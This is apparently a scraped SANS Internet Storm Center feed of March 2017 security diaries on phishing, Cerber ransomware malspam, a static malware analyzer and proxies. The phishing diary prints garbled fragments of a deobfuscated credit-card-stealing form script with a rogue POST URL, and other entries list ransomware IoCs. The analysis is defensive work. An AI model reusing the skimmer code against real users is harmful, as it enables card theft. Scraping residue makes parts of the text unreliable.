Internet Storm Center


News Feeds (RSS) Internet Storm Center

Sat, 25 Mar 2017 12:02:56 -0600

Have you noticed that some security projects never seem to get finished? Despite the best of intentions, often times they linger, sometimes for years. I believe that distractions play a role in security projects being delayed and ultimately never being completed. If not monitored closely, nothing will get moved from the to do list to the this security project is finally done list.
For me, it has always been natural to accept every new project that needs attention. I want to be helpful and perceived as a good team player and I bet you do as well. I found that it is easier to say yes to every request for help than to say no. I suspect that why yes I do have a minute and of course I can help you with that problem sound very familiar. I have found this behavior can also carry potential for a negative reputation as an information security professional when it impacts the delivery of security projects.
While it is normal to want to help, it is not always natural to remain focused immediately after a distraction occurs. I have determined to ask the question what is the next action I can take right now? immediately after a distraction. I found this behavior helpful to remain both mission focused and results oriented. With some intentional discipline and focus on the impact of distractions on security projects, the impact of unplanned distractions can be minimized.
It is impossible to enumerate all of the ways distractions can impact a security project. It is very possible to more quickly recognize them when they occur and put measures in place to reduce the impact ofdistractions severely impacting productivity. Are distractions keeping you from closing out projects and ultimately preventing you from providing full value to your organization?
Please leave what works in the comments section below.
Russell Eubanks
(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Fri, 24 Mar 2017 11:45:23 -0600

One of our readers sent us an interesting sample that was captured by his anti-spam. The suspicious email had an HTML file attached to it. By having a look at the file manually, it is heavily padding:5px 10px"> var iKz7xb8 = 160b6e65697e737a6f0a627e67661416425e47460a464b444d17084f44081416424f4b4e1416 474f5e4b0a49424b58594f5e17085f5e4c0712081416474f5e4b0a444b474f17085c434f5d5a45585e080a49454 45e4f445e17085d434e5e42174e4f5c43494f075d434e5e42060a4344435e434b460759494b464f171b08141646 4344410a42584f4c1708425e5e5a591005054c45445e59044d45454d464f4b5a43590449454705495959154c4b4 743465317784548455e45080a584f461708595e53464f59424f4f5e08140a16595e53464f1400514c45445e074c 4b47434653100a0d784548455e450d060a5 ...

The file has a current VT score of 0/55 [1] and isfree width:808px" />

The HTTP form data are sent to a rogue server but how to get it? To obtain more details about the malicious JavaScript code, it can be de-obfuscated with JSDetox[2] and some manual changes. The complete code can now be padding:5px 10px"> input type=button class=ssP onClick=ss() value=Submit Form ... function ss(){ if (!TLSPort()){ window.location.replace( } var GoogleAnalytics=hxxp:// + 86c2e66377265675a8a0edc1befe1837.php document.forms[pFdocument.forms[pF].method=POST document.forms[pF if (!v || !w || !x || y==00 || z==00x=x.replace(/\D/g, n if (be){ if ((nd *=2) be=!be } return (nn % 10)==0 }

Here is a valid POST to the attacker width:800px" />


Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Fri, 24 Mar 2017 03:25:03 -0600

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Thu, 23 Mar 2017 02:55:01 -0600

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Thu, 23 Mar 2017 01:06:48 -0600

SSMA is handy tool for quickly getting an idea if a file is malicious.


sudo apt-get install python3-pip

git clone


sudo pip3 install -r requirements.txt


To use, just run the command along with your VirusTotal API key and the file to get the results. After each test, it will ask you if you want to continue analysis. In this example I used a version mebroot for testing.

python3 -h

python3 /home/twebb/Downloads/SSMA/ -k VT_API_KEY 00000025.exe


???????????????????? ???? ??????

????????????????????? ????????????? Simple

??????????????????????????????????? Static

??????????????????????????????????? Malware

??????????????????? ??? ?????? ??? Analyzer

??????????????????? ?????? ???

File Details:

File: /home/twebb/malware/2-mar-2010 torpig/00000025.exe

Size: 280960 bytes

Type: application/x-dosexec

MD5: ae26e139311e2cacef53cce6d8da09da

SHA1: b9942fd44e798073821dd4b1d9b21f1814d766ad

Date: Fri Nov 28 00:33:22 2003

PE file entropy: 7.618302492203651

Very high or very low entropy means that file is compressed or encrypted since truly random data is not common.


Continue? [Y/n] y

Number of Sections: 5

Section VirtualAddress VirtualSize SizeofRawData Entropy

.code 0x480 26965 27008 6.511691201650016

.rdata 0x6e00 152 256 2.401459977262458

.data 0x6f00 251148 251264 7.654305920976193

INIT 0x44480 306 384 4.063770965426124

.reloc 0x44600 854 896 1.656681300794013

Very high or very low entropy means that file/section is compressed or encrypted since truly random data is not common.

SUSPICIOUS section names: INIT


Continue? [Y/n] y


F-Secure - Gen:Rootkit.Heur.ruW@CS!sLed

NOD32 - a variant of Win32/Mebroot.CK

Ikarus - Backdoor.Win32.Sinowal

McAfee-GW-Edition - Trojan.Crypt.ZPACK.Gen

Symantec - Suspicious.Insight

BitDefender - Gen:Rootkit.Heur.ruW@CS!sLed

AntiVir - TR/Crypt.ZPACK.Gen

GData - Gen:Rootkit.Heur.ruW@CS!sLed

nProtect - Gen:Rootkit.Heur.ruW@CS!sLed

a-squared - Backdoor.Win32.Sinowal!IK


Continue? [Y/n] y

Scan file using Yara-rules.

With Yara rules you can create a description of malware families to detect new samples.

For more information:

Downloading Yara-rules...

These Yara rules specialised on the identification of well-known malware.


QuarianCode - Quarian code features

Quarian - Quarian


Continue? [Y/n] y

These Yara Rules aimed to detect well-known software packages, that can be used by malware to hide itself.




Continue? [Y/n] y

These Yara rules aimed to detect the existence of cryptographic algorithms.

Detected cryptographic algorithms:

contentis_base64 - This rule finds for base64 strings


Continue? [Y/n] y

There are lots of tools like this, but this one is worth giving a try due to how quick and easy the install was. What yours favorite static analysis tool?


Tom Webb


(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Wed, 22 Mar 2017 15:33:48 -0600

2017-03-22 Update: This diary was posted earlier, but we had some technical issues, and the previous diary disappeared. I had to re-post this as a new diary with a new story ID and URL.


Cerber ransomware has been a constant presence since it was first discovered in February 2016. Since then, Ive seen it consistently pushed by exploit kits (like Rig and Magnitude) from the pseudoDarkleech and other campaigns. Ive also been tracking Cerber on a daily basis from malicious spam (malspam).

Some malspam pushing Cerber is part of the Blank Slate campaign. Why call it Blank Slate? Because the emails have no message text, and theres nothing to indicate what, exactly, the attachments are. Subject lines and attachment names are vague and usually consist of random numbers.

An interesting aspect of this campaign is that the file attachments are double-zipped. Theres a zip archive within the zip archive. Within that second zip archive, youll find a malicious JavaScript (.js) file or a Microsoft Word document. These files are designed to infect a computer with ransomware.

Blank Slate has pushed different types of ransomware. However, the vast majority of ransomware from this campaign has been Cerber. I wrote an in-depth article about Blank Slate earlier this month, and it border-width:2px" />
Shown above: Chain of events for a Blank Slate Cerber infection.

Lets look at some examples from Monday and Tuesday of this week (2017-03-20 and 2017-03-21).

The emails

Like other malspam campaigns, Blank Slate emails come from numerous hosts across the globe. I always think of this as botnet-based malspam, but I dont have any visibility on the sending side. border-width:2px" />
Shown above: Ten emails from this campaign on 2017-03-20 and 03-21.

Sending email addresses are always spoofed. The only reliable source data consists of IP addresses for sending mail servers, specifically the one that directly contacted the recipients mail server, as noted in the email headers. Everything else in an email can probably be spoofed.

What does one of these emails look like? Below is a screen shot with the recipient border-width:2px" />
Shown above: An email from the Blank Slate campaign.

Whats in the zip file attachment? width:615px" />
Shown above: Contents of the zip attachment from a Blank Slate campaign email.

Whats in that zip within the zip? Its either a Microsoft Word document, or its a .js file. In this case its a .js file. I border-width:2px" />
Shown above: Contents of the zip archive within the zip archive.

The .js file contains obfuscated script. border-width:2px" />
Shown above: Start of obfuscated script in the .js file.

The traffic

On Monday 2017-03-20, I ran one of the extracted .js files on a vulnerable Windows host. After an initial HTTP GET request for the ransomware binary, post-infection traffic was similar to several other recent examples of Cerber. Youll see UDP traffic from the infected host over port 6892. Thats followed by HTTP traffic to a domain starting with p27dokhpz2n7nvgr and ending with .top. IP addresses for the UDP traffic changes every week or two (or longer). border-width:2px" />
Shown above: Infection traffic from Monday 2017-03-20.

The infected Windows host acted similar to other hosts Ive infected in previous months. Along with the desktop background, decryption instructions were dropped to the desktop in three different files. border-width:2px" />
Shown above: An infected Windows host from Monday 2017-03-20.

The decryption process hasnt changed in recent months. Recently, whenever Ive checked Cerber decryption instructions, the ransom was consistently $500 US dollars. The bitcoin amount had always reflected that $500 dollar value. But this weeks example was different. border-width:2px" />
Shown above: Cerber decryptor page with the ransom cost.

Indicators of Compromise (IoC)

The following IP is traffic generated by the extracted .js files that downloaded Cerber:

  • or - - GET /admin.php?f=2.gif
  • or - - GET /admin.php?f=2.gif
  • or - - GET /user.php?f=2.gif
  • - - GET /search.php
  • - - GET /search.php

Post-infection Cerber traffic:

  • to ( UDP port 6892
  • to ( UDP port 6892
  • to ( UDP port 6892
  • HTTP traffic to a domain starting with p27dokhpz2n7nvgr and ending with .top

Cerber samples collected using this batch of emails:

SHA256 hash: 92135e39f2e0db1aaf6605446e24fc9aedc36eb4bed9e7cdad1e92e4d387ed04

  • File description: Cerber sample from on 2017-03-20
  • File size: 264,378 bytes

SHA256 hash: 035d137592a7f6ce707739ceecb09db517587bcb0100254c3dd8ee4a262603af

  • File description: Cerber sample from on 2017-03-20
  • File size: 264,377 bytes

SHA256 hash: ee6b4e29aac7ca55a19265728d484221956b1b11c4961b60dd70137316bde245

  • File description: Cerber sample from on 2017-03-20
  • File size: 264,378 bytes

SHA256 hash: 0456237db4444582d94f4231824bdc09475d844820f14fcd2172ccdc13bddbf3

  • File description: Cerber sample from on 2017-03-21
  • File size: 273,618 bytes

SHA256 hash: d3a6ab8e8f6eb49cba032208d04d7105ac764982ca56fcaf1a421396e1adadfa

  • File description: Cerber sample from on 2017-03-21
  • File size: 273,617 bytes

Final words

I always wonder how effective campaigns like this are. Potential victims must open an attachment from a blank email, go through two zip archives, then double-click the final file. If the final file is a Word document, the victim must also enable macros.

And that works on default Windows configurations. But properly-administered Windows hosts and decent email filtering are enough, I think, to keep most people from worring about it. Im far more interested in the cycle of abuse targeting hosting providers. Without web servers to host ransomware binaries, Blank Slate cannot continue its current method of operations.

For more details on Blank Slate, see my previous writeup about it. Pcap and malware samples for this ISC diary can be found here.

Brad Duncan
brad [at]

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Wed, 22 Mar 2017 02:25:02 -0600

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Tue, 21 Mar 2017 02:50:02 -0600

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Tue, 21 Mar 2017 02:46:52 -0600


On Monday 2017-03-20, the ISC received a notification through our contact page. Someone reported numerous items of malicious spam (malspam) sent to addresses at his organization. The malspam had Microsoft Word documents (.docx files) as attachments and subject lines such as:

  • Fwd:Ticket k29y729n71c52h692o53171
  • ReTicket 985v49f155t06g78v412a3n382
  • Fwd:Ticket 048f1v00u98
  • ReTicket y18k9178280
  • Ticket p574v892f453b467
  • Ticket e26099p58v65x073
  • ReInquiry 9l48o77
  • Inquiry m70q200kd80
  • ReInquiry t63j288d271f997b083a57c547
  • ReInquiry f514f830p417n06h5150s036r838

An example of the message text:

Check the payment report created for [recipients email address] as you just ordered.

You may need Doc Passcode: [string of alphanumeric characters]

[fake senders name]

The attached Word documents were approximately 70 kB in size and password-protected. The document file names started with the string of alphanumeric characters from the subject line followed by the recipients email address. File names all ended with the .docx file extension.

This diary documents my investigation into this wave of malspam. Were always thankful for people who submit samples of emails and malware like this to the ISC.

The email

The email appeared somewhat common for most malspam we see. People sometimes think if malsapm has the recipients name in the email, it must be targeted. However, thats often not the case. This type of malspam is easily automated, and it can seem convincing when the recipient border-width:2px" />
Shown above: An example of the malspam.

The attachment

The document would only open after using the password from malspam it was attached to. This tactic typically allows the document to bypass detection in anti-virus tools. border-width:2px" />
Shown above: Request for the attached documents password.

The document had three embedded objects that were supposedly Word documents. Dragging and dropping the objects onto the desktop revealed these were the same Visual Basic Script (VBS) file. border-width:2px" />
Shown above: border-width:2px" />
Shown above: Text from the embedded VBS file.

The traffic

Executing the VBS file on a Windows host in my lab generated HTTP traffic. This is typically an attempt to download additional malware like a Windows executable or DLL file. border-width:2px" />
Shown above: Traffic generated by the .vbs file.

I searched (also available as Payload Security on and found 21 items submitted on Monday 2017-03-20 associated with the domain. Most were other documents from the same type of malspam. Two were attempts to analyze an extracted .vbs file. One was a query to the callback URL. None of these examples made it any farther than I did.

NOTE: Getting these search results on requires a login. border-width:2px" />
Shown above: Search results on ( for the callback domain.

Indicators of compromise (IoC)

The following indicators are associated with todays malspam example:

Password-protected Word document:

Word document with password-protection removed:

VBS file embedded in the Word document:

Traffic generated by the VBS file:

  • port 80 - - GET /log.pkp

Final words

Last week, someone at blogged about similar malspam designed to infect Windows hosts with an Ursnif banking Trojan. This type of password-protection technique in malspam attachments is nothing new. Ive certainly seen it before, and some creative Google searching will reveal this started years ago. However, I havent seen much about this in public forums lately.

Most security professionals assume we all know about it, so it doesnt usually make any headlines. I advise people this is still a thing.

Of course, properly-administered Windows hosts are far less vulnerable to this type of infection. The hosts I use in my lab environment are a different story. If anyone knows of someone who was actually infected from one of these password-protected documents, please share your tale in the comments.

Brad Duncan
brad [at]

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Mon, 20 Mar 2017 11:57:06 -0600

An observation from the road, was with a client recently and the discussion of proxy entered into the conversation. Now before we get all Political and start dropping packet bombs, a technical challenge came up that made me really think.

  1. What traffic is really hitting the proxy?
  2. How many proxy bypass rules are in place?
  3. Are you inspecting Encrypted Traffic?
  4. Who/What is in the Encryption Inspection Bypass list?

Google recently released some numbers on encrypted traffic and we are WELL past the 50% mark [1] [2] [3]. With the ease of getting signed certificates through organizations like Letsencrypt and the high level of privacy concerns in the world, it only makes sense [4].

The observation, proxy was politically driven, senior management did not have the right business understanding of what a proxy does. Further, the word proxy had become and abstract term for the concept of filtering, blocking, and proxy. This made it hard when vendor uses industry language and organization says yes, we understand that is whats REALLY going on but please say proxy for that with management.

Now to the discovery portion of our diary, how long has it been since you have looked at what is actually flowing out of your environment? Yes yes.. we know that everything runs over ports 80 or 443, but after taking a look at my own environment? A little bit more of non 80/443tcp traffic was leaving that expected (and that was even with the cynical pre-disposition).

With a greater than 50% of traffic being encrypted it is clear that the topic of decryption needs to be revisited. Along with that, what is actually being picked up outbound and what is not hitting the known exit points (e.g. is it really going over 443?).





Richard Porter

--- ISC Handler on Duty

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.